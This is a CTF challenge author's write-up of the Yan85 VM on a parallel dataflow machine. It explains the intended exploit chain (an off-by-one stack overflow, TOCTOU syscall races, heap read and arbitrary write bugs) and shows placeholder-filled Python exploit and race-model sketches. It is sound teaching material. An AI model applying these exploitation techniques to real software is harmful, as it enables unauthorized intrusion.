This challenge is an implementation of the pwn.college "Yan85" vm written on top of the Manchester parallel machine.
Authors: adamd and Zardus (even though Zardus wrote zero lines of code, he inspired this challenge and acted as my rubber ducky constantly during development, so in true academic spirit he should get credit as well, but none of the blame).
Part of the idea for this challenge is that, honestly, I was bummed that teams didn't really get to the depth of the parallel-af challenge, which had four bugs in phase 2 and a trap mode that was never used. I felt that the teams didn't understand the true nature and coolness of the parallel machine, and the bugs that I had did not exploit anything specific to the parallel machine architecture.
After chatting with Zardus, the core concept of the challenge solidified: the "Yan85" VM is very similar to x86 except for one crucial difference: because instruction opcodes (and operands) are single bits, you can have instructions with multiple opcodes set (i.e., one instruction that does an add, a load from memory, and a syscall). We hypothesized that a Yan85-style VM on a parallel machine could have race conditions in multiple-opcode instructions due to the inherent non-determinism of the parallel machine (there is no concept of a program counter in a dataflow machine because instructions execute when their data is ready), and this was the core inspiration for the challenge.
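To make the multi-opcode idea concrete, here's a minimal Python sketch of what such a bit-flag decoder could look like; the opcode values, register layout, and syscall handling are all made up for illustration (the real Yan85 encodings are randomized per build), and a sequential interpreter like this hides exactly the ordering that the parallel machine does not guarantee.

```python
from dataclasses import dataclass, field

# Hypothetical one-bit opcodes; the real Yan85 values are randomized per build.
OP_ADD = 0x01   # add two registers
OP_LDM = 0x02   # load from memory
OP_SYS = 0x04   # perform a syscall

@dataclass
class State:
    regs: dict = field(default_factory=lambda: {0: 0, 1: 4, 2: 0})
    mem: bytearray = field(default_factory=lambda: bytearray(256))

    def syscall(self, num, arg):
        print(f"syscall {num}({arg})")

def execute(op, a, b, state):
    # Because each opcode is a single bit, one instruction byte can request
    # several operations at once; this sequential interpreter just picks an
    # order for them.
    if op & OP_ADD:
        state.regs[a] = (state.regs[a] + state.regs[b]) & 0xFF
    if op & OP_LDM:
        state.regs[a] = state.mem[state.regs[b]]
    if op & OP_SYS:
        state.syscall(a, b)
    # On a dataflow machine there is no inherent ordering between these
    # branches, which is where the race conditions come from.

# One instruction that adds, loads, and traps into a syscall all at once.
execute(OP_ADD | OP_LDM | OP_SYS, 0, 1, State())
```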
I changed a decent amount in the program, but the main new components are:
- arrays.c: the implementation of a new module in the parallel machine for arrays. This was a major pain in the original parallel-af challenge because all data in the machine needed to be 8 bytes max, and it's very hard to write a VM like that. I designed the instructions inspired by Lisp aref operations (a sketch of the intended semantics follows this list).
- vm.force: the implementation of the Yan85 VM in the force language.
- vm-assembler.py: a Yan85 VM assembler.
- p aka vuln.vm: a "simple" menu-based log system. Due to the constraints of the Yan85 machine, programming this is a major PITA (e.g., the only computation instruction is add), so I took a lot of shortcuts, such as my implementation of print_int, which only works for 0 through 10 (but at least it's documented?).
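As a rough illustration of the aref-style interface the array module exposes (mentioned in the arrays.c item above), here's a toy Python model; the handle scheme and operation names are simplifications, not the actual instruction encoding.

```python
# Toy model of the array module's interface: each array lives in the module's
# own storage and is referred to by a small handle, so individual values moving
# through the parallel machine can stay within its 8-byte limit.
arrays = {}
next_handle = 0

def a_new(size):
    global next_handle
    handle = next_handle
    next_handle += 1
    arrays[handle] = [0] * size
    return handle

def a_ref(handle, index):          # like Lisp (aref arr index): read one element
    return arrays[handle][index]

def a_set(handle, index, value):   # like Lisp (setf (aref arr index) value)
    arrays[handle][index] = value

h = a_new(4)
a_set(h, 2, 0x41)
assert a_ref(h, 2) == 0x41
```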
There were three stages to this challenge: baby, mama, and gran, with the differences between the stages being a 4-byte difference in checks of the same name (the string "mama" was changed to "flag" in vm for stage 2, and the string "gran" was changed to "flag" in manchester for stage 3). The idea was that checks to ensure that the teams could not open the flag file were added in the vm and then in the parallel machine itself (and the goal was to bypass those).
The goal of stage 1 was for teams to understand the Yan85 VM, identify a vulnerability, and write Yan85 shellcode.
The intended path for baby was an off-by-one error in how logs are stored in p. This allows you to change the max_num_logs variable so that you can start writing more log entries. You can create one more log entry and overwrite the name_len variable, which is used when deciding how many bytes to read onto the stack for the name of a log. This way, the next log entry will overflow the saved IP on the stack and redirect control to your Yan85 shellcode.
My shellcode for this vulnerability writes "flag" onto the stack (so that it's not dependent on the memory layout of the machine), calls open, then reads the flag and writes it out.
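For flavor, here's roughly what that flow looks like as a pwntools-style driver. Everything specific in it (host/port, menu strings, offsets, the overflow bytes) is a placeholder, not the real interface of p; it's just the shape of the attack.

```python
from pwn import p8, remote  # assumes pwntools; every offset/string below is made up

SHELLCODE = b"..."  # assembled Yan85 shellcode: push "flag", open, read, write

io = remote("challenge.example.com", 31337)     # hypothetical target

# 1. Off-by-one: the last byte of a log entry lands on max_num_logs,
#    so bump it so we're allowed to create extra entries.
io.sendlineafter(b"> ", b"1")                    # hypothetical "create log" menu item
io.sendafter(b"name: ", b"A" * 15 + p8(0x7f))

# 2. The extra entry overlaps name_len; make it huge so the next name read
#    copies far more bytes onto the stack than intended.
io.sendlineafter(b"> ", b"1")
io.sendafter(b"name: ", b"B" * 15 + p8(0xff))

# 3. The following log's name now overflows the saved IP and lands in our
#    Yan85 shellcode.
io.sendlineafter(b"> ", b"1")
io.sendafter(b"name: ", b"C" * 32 + SHELLCODE)

print(io.recvall(timeout=5))
```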
Another approach that I know teams used to solve this stage was to overwrite max_num_logs and then keep creating logs until they reached the stack. I think the next stages were not possible with this approach due to its slowness (deployment had a hard 5-minute timeout).
The goal of stage 2 was for teams to understand the race conditions due to non-determinism in the parallel machine, and to use such a race condition to exploit a TOCTOU vulnerability in the VM's check for "flag". While every instruction interpretation happened sequentially, there is no data dependency between the OPEN syscall and the READ syscall, so a Yan85 instruction of sys OPEN|READ d would be nondeterministic, and roughly 2% of the time a READ from stdin into the same buffer as the OPEN would hit in the middle of the TOCTOU. To get this working I had to experimentally add and remove instructions (hence the checks for only some files).
My Yan85 exploit code for this stage created the string "alag" in memory, issued a concurrent OPEN and READ syscall, and afterwards checked if it could read from a known FD. My Python exploit would then send a bunch of "f"s, which would be used to win the race, overwrite "alag" into "flag", and bypass the check. Oh, I also had to write a stage 0 shellcode which would read in the race shellcode, because the race shellcode was too big to put on the stack.
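One way to picture the TOCTOU is to model the OPEN and READ halves of the sys OPEN|READ instruction as two unordered operations on the same buffer. The Python threading sketch below is only a toy model of that nondeterminism, not of the parallel machine itself:

```python
import threading

def attempt():
    buf = bytearray(b"alag")            # name the shellcode places in VM memory
    result = []

    def vm_open():
        if bytes(buf) == b"flag":       # time-of-check: the VM refuses "flag"
            result.append(b"<blocked>")
            return
        # ...interpretation work with no data dependency on the READ...
        result.append(bytes(buf))       # time-of-use: the name is re-read from memory

    def vm_read():
        buf[0:1] = b"f"                 # READ from stdin lands in the same buffer

    t_open = threading.Thread(target=vm_open)
    t_read = threading.Thread(target=vm_read)
    t_open.start(); t_read.start()
    t_open.join(); t_read.join()
    return result[0]

outcomes = [attempt() for _ in range(1000)]
print(outcomes.count(b"flag"), "of 1000 toy attempts hit the TOCTOU window")
```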
Unfortunately, there was an unintended shortcut solution: the equality check for "flag" in the underlying parallel machine operated on 8 bytes and compared all 8 of them, while the underlying parallel machine's OPN instruction used C strings (null-byte delimited) to read the flag. Therefore, if you tried to OPEN a file from the Yan85 VM with flag\x00a, it would bypass the check and read the flag 😢.
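The mismatch is easy to see if you model both sides: the equality check compares a full 8-byte value, while OPN stops at the first NUL. A small Python model (the padding and helper names are illustrative):

```python
FLAG_QWORD = b"flag".ljust(8, b"\x00")      # what the 8-byte equality check compares against

def check_blocks(name8: bytes) -> bool:
    return name8 == FLAG_QWORD              # blocks only an exact 8-byte match

def opn_filename(name8: bytes) -> bytes:
    return name8.split(b"\x00", 1)[0]       # OPN treats the name as a C string

name = b"flag\x00a".ljust(8, b"\x00")       # "flag\x00a" sent from the Yan85 VM
assert not check_blocks(name)               # the check lets it through...
assert opn_filename(name) == b"flag"        # ...but the file actually opened is "flag"
```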
I implemented the missing check but did not deploy it (discussed later); interestingly, this check increases the success rate of the race to ~75%.
The goal of stage 3 was for the teams to exploit manchester using bugs in the array module.
First they had to win another data race in the OPEN syscall, around a check that should make it impossible to open a file for writing (the VM zeros out the write-mode bytes if it detects them). If teams used the shortcut solution for stage 2, they would have no idea how to proceed from here.
The quit file is the only writable file in the whole directory (and path traversal should be impossible due to a check), and the only modification to sh was to first call vm p and then call quit.
If you send up a Yan85 sys OPEN|READ syscall to try to open quit and point the flags at the same memory location as quit, it will try to open the file puit (due to the flag check) in read mode. However, by using the idea of a data race and sending a q as input, if you win the race you will be able to open quit for writing.
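Here's a toy Python model of that trick: the open flags and the first byte of the filename alias the same memory, the check clears the write bit (turning 'q', 0x71, into 'p', 0x70), and a racing READ of "q" can restore it after the check has run. The single-byte aliasing and the write bit value (0x1, as in O_WRONLY) are my simplification of what actually happens in the VM.

```python
import threading

def attempt():
    # One shared buffer plays both roles, because the exploit points the open
    # flags at the same memory as the filename "quit".
    mem = bytearray(b"quit")
    result = []

    def vm_open():
        mem[0] &= ~0x01                 # check: strip the write bit -> "quit" becomes "puit"
        # ...no data dependency forces the READ to wait for this...
        result.append((bytes(mem), bool(mem[0] & 0x01)))   # time-of-use: name + write bit

    def vm_read():
        mem[0:1] = b"q"                 # racing READ: the attacker sends "q" on stdin

    t_open = threading.Thread(target=vm_open)
    t_read = threading.Thread(target=vm_read)
    t_open.start(); t_read.start()
    t_open.join(); t_read.join()
    return result[0]

name, writable = attempt()
print(name, "writable" if writable else "read-only")   # winning the race gives a writable "quit"
```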
Now, you can write a parallel machine program!
The next part takes advantage of two vulnerabilities in the array module (a heap read and an arbitrary write) and a data leak in the queue module.
The ARF instruction has a signed/unsigned vulnerability that allows heap memory reads: a parallel machine program can read data on the heap at a negative location relative to a new array.
The AST instruction has an arbitrary write vulnerability: even though it checks that the given position is within the known array bounds, the check is incorrect.
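To make the ARF bug concrete, here's a toy Python model of an interpreter that receives the index as an unsigned byte but reinterprets it as signed when computing the element address, so a "negative" index reads heap memory sitting just before the freshly allocated array. The heap layout and sizes are invented for illustration; AST's broken bounds check gives the analogous write primitive.

```python
import ctypes

# Toy heap: interesting data (here a fake pointer) sits just before the new array.
heap = bytearray(b"\x00" * 8 + b"STACKPTR" + b"\x00" * 32)
ARRAY_BASE = 16        # the freshly allocated array starts here...
ARRAY_LEN = 32         # ...and is 32 bytes long

def arf(index_byte: int) -> int:
    # Model of the bug: the operand arrives as an unsigned byte, but the bounds
    # check and the address computation treat it as signed.
    index = ctypes.c_int8(index_byte).value      # 0x80..0xff become negative
    if index >= ARRAY_LEN:                       # only the upper bound is checked
        raise IndexError("out of bounds")
    return heap[ARRAY_BASE + index]              # a negative index reads before the array

# "Element" 0xF8 is -8, so this leaks the 8 bytes sitting before the array.
leaked = bytes(arf(0xF8 + i) for i in range(8))
print(leaked)                                    # b'STACKPTR'
```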
I'm not a heap expert, so I wasn't sure whether you could achieve code execution using only these two primitives (you cannot trigger any frees). Plus, the seccomp filters for the array module would mean that you couldn't read the flag anyway (we'll see how to get around that).
So, there was a bug in the queue module where the queue struct that was created on the stack was copied onto the heap, which would leak a stack address onto the heap.
At this point you can leak the stack address from the heap, then use the arbitrary write to write values onto the stack. But what to write? The array module executes as a giant while loop, so I don't think you can overwrite the saved RIP on the stack.
My solution was to target the currently processing execution_packet on the stack, specifically to set the ring to zero, the opcode to OPN, and data_1 to flag, which would bypass the stage 3 check in the input module.
(In full honesty, my original plan was to keep the opcodes and structs of the parallel machine the same, but since I had to change the queue struct and the execution_packet struct to accomplish this, I decided to modify all the rest of the machine so it wasn't obvious.)
This resulted in a parallel machine program that would first leak out the value from the heap, then call an AST instruction that would actually transform itself into an OPN flag instruction in ring 0.
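In Python-flavored pseudocode, the flow of that parallel machine program looks something like the sketch below; the helpers, offsets, and the OPN value are hypothetical stand-ins for the ARF read, the AST write, and the queue leak described above.

```python
OPN = 0x04                          # hypothetical opcode value for OPN

def leak_heap_qword(offset):        # stand-in for the ARF negative-index read
    return 0x7FFFFFFFE000           # pretend this is the leaked stack pointer

writes = []
def arbitrary_write(addr, value):   # stand-in for the AST out-of-bounds write
    writes.append((addr, value))

# 1. The queue bug copied a stack struct onto the heap, so a stack pointer sits
#    at some fixed (here invented) negative offset from the new array.
stack_leak = leak_heap_qword(-0x40)

# 2. From the leak, compute where the currently processing execution_packet
#    lives on the stack (the offset is a placeholder).
packet = stack_leak - 0x120

# 3. Rewrite the packet so that, when it executes, it is an OPN "flag"
#    instruction in ring 0, bypassing the stage 3 check in the input module.
arbitrary_write(packet + 0x00, 0)                                  # ring   = 0
arbitrary_write(packet + 0x08, OPN)                                # opcode = OPN
arbitrary_write(packet + 0x10, int.from_bytes(b"flag", "little"))  # data_1 = "flag"

print([hex(a) for a, _ in writes])
```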
Putting this all together, exploit.py essentially first exploits the stage 1 vulnerability to execute the loaded shellcode. Then it sends Yan85 shellcode that first wins the data race to open quit for writing, then reads in the quit parallel program.
This exploit works 1 in 16 times because the last byte of the stack leak is overwritten by the struct's ring field. Since the parallel machine is Turing complete, I'm sure a sufficiently smart human could write a deterministic exploit.
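Since the full chain only lands about 1 time in 16, the outer driver is basically just a retry loop; something like this, where run_exploit_once and the flag format are placeholders for the real stage 1 → race → parallel-program pipeline:

```python
import subprocess

def run_exploit_once() -> bytes:
    # Placeholder for one end-to-end attempt: stage 1 overflow, the OPEN|READ
    # race to open quit for writing, then the parallel machine program.
    return subprocess.run(["python3", "exploit.py"], capture_output=True).stdout

for attempt in range(64):                  # ~1/16 success rate, so a few dozen tries
    output = run_exploit_once()
    if b"OOO{" in output:                  # hypothetical flag format
        print(f"won on attempt {attempt}: {output!r}")
        break
else:
    print("no luck this time, run it again")
```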
From a development perspective, nothing helped more than creating an Emacs mode for the force language. I didn't do this for Yan85, and it was a massive pain.
Long story short, my parallel machine compiler and assembler were non-deterministic because I was using Python sets and defaultdicts, and this would affect the generated code. This caused hair-pullingly difficult problems where I would test the data race, make a change to make it easier to win, and it would somehow be harder. Note to self: always ensure your compiler is deterministic (and PYTHONHASHSEED=0 is your friend).
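The failure mode is easy to reproduce: iteration order over a set of strings depends on the per-process hash seed, so any code generation that walks a set can emit different code on different runs. A minimal demonstration, plus the two usual fixes:

```python
import os, subprocess, sys

snippet = "print(list({'add', 'open', 'read', 'write', 'jmp'}))"

# The same program run under two different hash seeds will (usually) print the
# set's elements in two different orders -- and so would any codegen that
# iterates over a set.
for seed in ("1", "2"):
    out = subprocess.run([sys.executable, "-c", snippet],
                         env={**os.environ, "PYTHONHASHSEED": seed},
                         capture_output=True, text=True).stdout.strip()
    print(f"PYTHONHASHSEED={seed}: {out}")

# Fix 1: pin the seed (PYTHONHASHSEED=0) when invoking the compiler/assembler.
# Fix 2 (better): never let set/defaultdict iteration order reach the output,
# e.g. emit code from sorted(instructions) instead of iterating the set directly.
```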
The stage 2 shortcut solution was very frustrating. Of course I tested my stage 1 solution against stage 2 (it did not work), and I even tested the first stage 1 solution from the teams against the unreleased stage 2 (it also did not work). So we released stage 2, but teams were exploiting it much quicker than I expected.
After digging in (while very sleep deprived), I realized what the bug was and we were faced with a few choices:
- Deploy the fixed version of mama (stage 2) as an additional challenge. Not really an option, because with 3 stages this whole challenge direction is worth a lot of points already, and adding another is probably too much.
- Redeploy the fixed version of mama and take the flags away from the teams that had already solved it. This isn't something that we've really done before, and by this point 3 or 4 teams had already solved it, and they might have redirected people away from the problem once it was solved. Another risk is that the additional check changes the race condition and makes it way easier (which would have required significant tweaking on my part, which is very risky to do while sleep deprived). We decided against this option (although I still wonder if this would have been better).
- Do nothing. We reasoned that the shortcut solution of stage 2 would get teams no closer to stage 3 (since they would have no idea about the data race), so in this way stage 3 would sort of make up the difference. Ultimately this is what we decided to do.
- Release a fixed version of mama as a hint for stage 3, saying that if you solved the fixed version of mama then you were on the way to the first part of stage 3. I explored this option (creating the fix and ensuring that it was solvable), and polled the teams that were the first to solve stage 1 and stage 2. When I realized that they had found the data race, we abandoned this idea.
Still not sure what the right approach was here, but at least now you understand what happened and our reasoning.
I did the development and exploitation of the challenge on a remote machine. Then I built the challenge for deployment on my laptop and pushed it to infra. All should be fine, I thought: the teams have complete knowledge of the challenge, the exact Dockerfile and binaries, everything to run the challenge exactly as it's running in the infra. I even had the thought "I should probably give them the libc .so", but then I thought, what's the point, they have full knowledge.
Unfortunately, I didn't realize that my laptop's Docker was using an old cached version of ubuntu:18.04, so the deployed libc version was about a year old. This caused unexpected and unintended hardship for teams that were very close to exploiting stage 3, and I'm sorry for that.
One of the things that drew me to this challenge is that parallel machines represent a fundamentally different model of computation (a computer architecture without a program counter, and the finest-grained parallelism possible). And teams in the 2020 finals barely scratched the surface of this cool concept.
Of course, teams that played DEFCON CTF 2020 finals would have an advantage on such a challenge due to familiarity with the concept and hands-on experience (although of all 16 teams PPP was the one that had the best command of the parallel machine IIRC).
We discussed it internally and decided that it would be OK, given the following factors: (1) the parallel-af machine has been open source since finals, (2) I discussed the ideas and concepts of the parallel machine publicly (OOO CTF recaps), and (3) the race-condition-style bug was not used at all in finals. We would also point people to the parallel-af source code so that they could start from there (and have code/docs/papers to reference).
The feedback we received was that some teams still felt that this unfairly benefited finals teams, which we now kind of agree with. One thing to note is that I've heard from several teams that they exploited stage 1 in a completely black-box way and did no real reversing of the VM (if I understand them correctly), which is pretty cool.
Hope you enjoyed the challenge, it was a joy and a pain to write, and I learned a ton. I hope you did too.
- adamd